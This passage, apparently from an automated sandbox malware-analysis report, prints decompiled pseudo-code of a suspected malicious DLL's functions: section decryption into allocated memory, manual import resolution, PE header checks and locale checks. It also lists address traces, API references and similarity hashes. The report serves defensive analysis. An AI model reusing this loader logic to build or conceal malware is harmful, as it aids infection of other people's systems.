					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x6f2541cc;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x6f255137; // 0x6f255137
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E6F251D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x6f2541cc = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x6f2515aa
0x6f2515ba
0x6f2515c1
0x6f2515c4
0x6f2515d9
0x6f2515e0
0x6f2515e5
0x6f2515f6
0x6f2515f9
0x6f251601
0x6f251604
0x6f2516ae
0x6f25160a
0x6f25160a
0x6f25160e
0x6f251676
0x6f251610
0x6f251610
0x6f251613
0x6f251615
0x6f25161d
0x6f251620
0x6f251623
0x6f25162b
0x6f251633
0x6f251634
0x6f251635
0x6f25163c
0x6f25163c
0x6f251650
0x6f251655
0x6f25165e
0x6f251665
0x6f251668
0x6f25166c
0x6f251671
0x00000000
0x00000000
0x6f251628
0x6f251628
0x6f251673
0x6f251680
0x6f251695
0x6f251682
0x6f25168b
0x6f251690
0x6f2516a6
0x6f2516a6
0x6f2516b5
0x6f2516bb

APIs

VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6F2515F9
memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6F2517EC), ref: 6F25168B
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6F2516A6

Strings

Mar 26 2021, xrefs: 6F25162B

Memory Dump Source

Source File: 00000000.00000002.878604133.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000000.00000002.878583906.000000006F250000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878633029.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878661607.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.878711212.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Mar 26 2021
API String ID: 4010158826-2175073649
Opcode ID: 1d4bdebf1233817810411bd73c0e8de8338617dfc0f85c4a6cb2973e9152fcf3
Instruction ID: 99bfe6870248c5f9c53b47ef89fddbb502a07b2e6690d461b83163b55550b1d4
Opcode Fuzzy Hash: 1d4bdebf1233817810411bd73c0e8de8338617dfc0f85c4a6cb2973e9152fcf3
Instruction Fuzzy Hash: FA313071E0061EAFDF01CFA9C981ADEBBB5BF49304F148169D904AB244D771AA65CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6F251D32, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6F251D32(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6F2517A7(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6f251d3b
0x6f251d40
0x6f251d4e
0x6f251d53
0x6f251d53
0x6f251d59
0x6f251d5e
0x6f251d62
0x6f251d66
0x6f251d66
0x6f251d70
0x6f251d79

APIs

GetCurrentThread.KERNEL32 ref: 6F251D35
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6F251D40
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6F251D53
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6F251D66

Memory Dump Source

Source File: 00000000.00000002.878604133.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000000.00000002.878583906.000000006F250000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878633029.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878661607.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.878711212.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 1ef41e4cc9982cce2377d503feb6cae500719913b772df88482f6a1ecad82798
Instruction ID: 5473cb18c9f406c259ee9965345ec4bb23dfdbf7306083750271cf999c5d15cf
Opcode Fuzzy Hash: 1ef41e4cc9982cce2377d503feb6cae500719913b772df88482f6a1ecad82798
Instruction Fuzzy Hash: 40E092313067152BD7022B2D4C89EABBB5DEF923327020335F524D21D0DB549C79CDA5

Uniqueness

Uniqueness Score: -1.00%

Function 6F25E850, Relevance: 2.3, APIs: 1, Instructions: 1034sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000000AE), ref: 6F25F465

Memory Dump Source

Source File: 00000000.00000002.878760000.000000006F25E000.00000020.00020000.sdmp, Offset: 6F25E000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: a2c2ba22d4654e1374292ba86ff6e0ee2e822eff99ea7bd97a8158083d2d08f1
Instruction ID: d73a66485532ddc918a52fa9effbf85ca0daf04ab8336d9aa4f884fa309e454a
Opcode Fuzzy Hash: a2c2ba22d4654e1374292ba86ff6e0ee2e822eff99ea7bd97a8158083d2d08f1
Instruction Fuzzy Hash: 3F928D72A0876A8FCB04CF3DC59815ABBE4FB9A324F08462EE494C7B59D3749529CF41

Uniqueness

Uniqueness Score: -1.00%

Function 6F25FD10, Relevance: 1.7, APIs: 1, Instructions: 195memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(6F28E720,00003043,00000040,?,6F27B8AC,?), ref: 6F25FDA5

Memory Dump Source

Source File: 00000000.00000002.878760000.000000006F25E000.00000020.00020000.sdmp, Offset: 6F25E000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6fef2777ea1f10f035a7d9b248483c89cb820421668104c0fdaa618a24741139
Instruction ID: c7665913693116b2ec1ab62f664ff03d4943435ae58c32e3e37b6bb82880f0c9
Opcode Fuzzy Hash: 6fef2777ea1f10f035a7d9b248483c89cb820421668104c0fdaa618a24741139
Instruction Fuzzy Hash: FF815A72A01A69CFDF04CF7DC95C69ABBE1EB87324B08816AD015C7B9AD730A525CF40

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6F252485, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F252485(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6f2541f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6f254240 = 1;
										__eflags =  *0x6f254240;
										if( *0x6f254240 != 0) {
											goto L60;
										}
										_t84 =  *0x6f2541f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6f254240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6f2541f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6f254200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6f2541fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6f254200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6f254200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6f254240 = 1;
							__eflags =  *0x6f254240;
							if( *0x6f254240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6f254200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6f254200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6f254240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6f254200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6f2541f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6f254200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6f254200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6f25248f
0x6f252492
0x6f252498
0x6f2524b6
0x00000000
0x6f2524b6
0x6f2524a0
0x6f2524a9
0x6f2524af
0x6f2524be
0x6f2524c1
0x6f2524c4
0x6f2524ce
0x6f2524ce
0x6f2524d0
0x6f2524d3
0x6f2524d5
0x6f2524d5
0x6f2524d7
0x6f2524da
0x00000000
0x00000000
0x6f2524dc
0x6f2524de
0x6f252544
0x6f252544
0x6f2526a2
0x00000000
0x6f2526a2
0x6f2524e0
0x6f2524e0
0x6f2524e4
0x6f2524e6
0x6f2524e6
0x6f2524e6
0x6f2524e6
0x6f2524e9
0x6f2524ea
0x6f2524ed
0x6f2524ed
0x6f2524f1
0x6f2524f5
0x6f252503
0x6f252503
0x6f25250b
0x6f252511
0x6f252513
0x6f252515
0x6f252525
0x6f252532
0x6f252536
0x6f25253b
0x6f25253d
0x6f2525bb
0x6f2525bb
0x6f25253f
0x6f25253f
0x6f25253f
0x6f2525bd
0x6f2525bf
0x6f2526a0
0x6f2526a0
0x00000000
0x6f2525c5
0x6f2525c5
0x6f2525cc
0x00000000
0x00000000
0x6f2525d2
0x6f2525d6
0x6f252632
0x6f252634
0x6f25263c
0x6f25263e
0x6f252640
0x00000000
0x00000000
0x6f252642
0x6f252648
0x6f25264a
0x6f25264c
0x6f252661
0x6f252661
0x6f252663
0x6f252692
0x6f252699
0x00000000
0x6f252699
0x6f252667
0x6f252668
0x6f25266a
0x6f25266c
0x6f25266c
0x6f25266e
0x6f252670
0x6f252672
0x6f252686
0x6f252686
0x6f252689
0x6f25268b
0x6f25268b
0x6f25268c
0x6f25268c
0x00000000
0x6f252674
0x6f252674
0x6f252674
0x6f25267d
0x6f25267e
0x6f252680
0x6f252682
0x6f252682
0x00000000
0x6f252674
0x6f252672
0x6f25264e
0x6f252655
0x6f252655
0x6f252657
0x00000000
0x00000000
0x6f252659
0x6f25265a
0x6f25265d
0x6f25265f
0x00000000
0x00000000
0x00000000
0x6f25265f
0x00000000
0x6f252655
0x6f2525d8
0x6f2525db
0x6f2525e0
0x00000000
0x00000000
0x6f2525e9
0x6f2525eb
0x6f2525f1
0x00000000
0x00000000
0x6f2525f7
0x6f2525fd
0x00000000
0x00000000
0x6f252603
0x6f252605
0x6f25260e
0x6f252612
0x00000000
0x00000000
0x6f252618
0x6f25261b
0x6f25261d
0x00000000
0x00000000
0x6f252624
0x6f252626
0x00000000
0x00000000
0x6f252628
0x6f25262c
0x00000000
0x00000000
0x00000000
0x6f25262c
0x00000000
0x00000000
0x00000000
0x6f252517
0x6f252517
0x6f252517
0x6f25251e
0x00000000
0x00000000
0x6f252520
0x6f252521
0x6f252523
0x00000000
0x00000000
0x00000000
0x6f252523
0x6f25254b
0x6f25254d
0x00000000
0x00000000
0x6f25255d
0x6f25255f
0x6f252561
0x00000000
0x00000000
0x6f252567
0x6f25256e
0x6f25259a
0x6f25259a
0x6f25259c
0x6f25259e
0x6f2525b2
0x6f2525b4
0x00000000
0x00000000
0x00000000
0x00000000
0x6f2525a0
0x6f2525a0
0x6f2525a0
0x6f2525a9
0x6f2525aa
0x6f2525ac
0x6f2525ae
0x6f2525ae
0x00000000
0x6f2525a0
0x6f252570
0x6f252573
0x6f252575
0x6f252587
0x6f252587
0x6f25258a
0x6f25258c
0x6f25258c
0x6f25258d
0x6f25258d
0x6f252593
0x00000000
0x00000000
0x00000000
0x00000000
0x6f252577
0x6f252577
0x6f252577
0x6f25257e
0x00000000
0x00000000
0x6f252580
0x6f252580
0x6f252581
0x00000000
0x00000000
0x00000000
0x6f252581
0x6f252583
0x6f252585
0x6f252598
0x00000000
0x00000000
0x00000000
0x6f252598
0x00000000
0x6f252585
0x6f2524f7
0x6f2524fa
0x6f2524fd
0x00000000
0x00000000
0x6f2524ff
0x6f252501
0x00000000
0x00000000
0x00000000
0x6f252501
0x6f2524c6
0x6f2524c8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6F252536

Strings

@B%o, xrefs: 6F252555
@B%o, xrefs: 6F252637
@B%o, xrefs: 6F252694

Memory Dump Source

Source File: 00000000.00000002.878604133.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000000.00000002.878583906.000000006F250000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878633029.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878661607.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.878711212.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID: @B%o$@B%o$@B%o
API String ID: 2850889275-1885572656
Opcode ID: a5534db8788a76a7d74932c62b2c74f1b3a39961988741d3507e43106ab588c2
Instruction ID: 3a0f74c530e1e0a01b42eec2fba465f2d4d7993608a439aa3b65c17b566f111d
Opcode Fuzzy Hash: a5534db8788a76a7d74932c62b2c74f1b3a39961988741d3507e43106ab588c2
Instruction Fuzzy Hash: 5861C1B0A0461B9FDB19CF28C8A075973B5BF85315F248169D815DB6C0E731E8B2CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F25146C, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F25146C() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6f2541b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6f2541bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6f2541ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6f2541a8 = _t5;
					 *0x6f2541b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6f2541a4 = _t6;
					if(_t6 == 0) {
						 *0x6f2541a4 =  *0x6f2541a4 | 0xffffffff;
					}
					return 0;
				}
			}

0x6f25146d
0x6f25147b
0x6f251483
0x6f251488
0x6f2514d2
0x6f2514d2
0x6f25148a
0x6f251492
0x6f2514ce
0x6f2514d0
0x6f251494
0x6f251494
0x6f251499
0x6f2514a7
0x6f2514ac
0x6f2514b2
0x6f2514ba
0x6f2514bf
0x6f2514c1
0x6f2514c1
0x6f2514cb
0x6f2514cb

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6F2517B8,747863F0,00000000), ref: 6F25147B
GetVersion.KERNEL32 ref: 6F25148A
GetCurrentProcessId.KERNEL32 ref: 6F251499
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6F2514B2

Memory Dump Source

Source File: 00000000.00000002.878604133.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000000.00000002.878583906.000000006F250000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878633029.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878661607.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.878711212.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: fa5c3ee0013b5a2744261e81a54cc3159c881668eae7aad6949aa86b9604394d
Instruction ID: d1269bcd9518d9f1beae657eecf5ded8f7bc99cfb57f78f6ecc792ef8328557c
Opcode Fuzzy Hash: fa5c3ee0013b5a2744261e81a54cc3159c881668eae7aad6949aa86b9604394d
Instruction Fuzzy Hash: F3F09A30644B11AFEF408F79AC2E782BBA1BB06B32F00901AF105C98C0D3B058B0CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 6F251566, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6F251566(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4);
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x6f25156a
0x6f25157b
0x6f251583
0x6f251585
0x6f251598
0x6f251598
0x6f2515a2

APIs

GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004,?,?,6F251C5E,?,6F251810,?,00000000,00000000,?,?,?,6F251810), ref: 6F25157B
GetSystemDefaultUILanguage.KERNEL32(?,?,6F251C5E,?,6F251810,?,00000000,00000000,?,?,?,6F251810), ref: 6F251585
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6F251C5E,?,6F251810,?,00000000,00000000,?,?,?,6F251810), ref: 6F251598

Memory Dump Source

Source File: 00000000.00000002.878604133.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000000.00000002.878583906.000000006F250000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878633029.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878661607.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.878711212.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: ac361aa17fc87d448f490f25478af8080fd7022200e3ac462ac04b4973eeb779
Instruction ID: 3b7b44e6e77b0926adea1bcfa81a7444453e186b13561eb5a5055e4dbba2ec89
Opcode Fuzzy Hash: ac361aa17fc87d448f490f25478af8080fd7022200e3ac462ac04b4973eeb779
Instruction Fuzzy Hash: D3E04878640349B6E700DB91DC0BF7D7278AB0071AF500044F701D64C0D674DE58DB25

Uniqueness

Uniqueness Score: -1.00%

Function 6F251F31, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F251F31(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6f2541cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71);
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6f251f31
0x6f251f3a
0x6f251f3f
0x6f251f45
0x6f251f4e
0x6f251f54
0x6f251f56
0x6f251f59
0x6f251f5e
0x6f251f65
0x6f251f65
0x6f251f69
0x6f251f71
0x6f251f74
0x00000000
0x00000000
0x6f251f7a
0x6f251f84
0x6f251f86
0x6f251f89
0x6f251f8c
0x6f251f90
0x6f251f98
0x6f251f9a
0x6f251f9d
0x6f252005
0x6f252005
0x6f252009
0x00000000
0x00000000
0x6f251fa2
0x6f251fa8
0x6f251faa
0x6f251fbd
0x6f251fc0
0x6f251fc0
0x6f251fc0
0x6f251fc4
0x6f251fac
0x6f251fac
0x6f251fb4
0x6f251fb6
0x00000000
0x00000000
0x00000000
0x00000000
0x6f251fb6
0x6f251fa4
0x6f251fa4
0x6f251fb8
0x6f251fb8
0x6f251fb8
0x6f251fc7
0x6f251fca
0x6f251fcc
0x6f251fd3
0x6f251fce
0x6f251fce
0x6f251fce
0x6f251fdb
0x6f251fe1
0x6f251fe3
0x6f252013
0x6f251fe5
0x6f251fe5
0x6f251fe8
0x6f251fea
0x6f251ff2
0x6f251ff2
0x6f251ff7
0x6f251ff9
0x6f252000
0x6f252002
0x6f252002
0x6f252002
0x00000000
0x6f252002
0x00000000
0x6f251fe3
0x6f251f92
0x6f251f94
0x6f251f96
0x00000000
0x00000000
0x6f251f96
0x6f252016
0x6f252016
0x6f25201d
0x6f252022
0x00000000
0x00000000
0x6f252028
0x6f252033
0x00000000
0x6f252033
0x6f25202a
0x6f25202a
0x6f252030
0x00000000
0x6f252030
0x6f251f5e
0x6f252034
0x6f252039

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6F251F69
GetProcAddress.KERNEL32(?,00000000), ref: 6F251FDB

Memory Dump Source

Source File: 00000000.00000002.878604133.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000000.00000002.878583906.000000006F250000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878633029.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878661607.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.878711212.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: e36a0bd32e5b9ba88dacceae2b476c4d98f00c162acfd76061a148571915bf4d
Instruction ID: 65a84c1a7aabcbbe3fa69048a09e330d2d420a6cb4583226dc9d1651c741c1a2
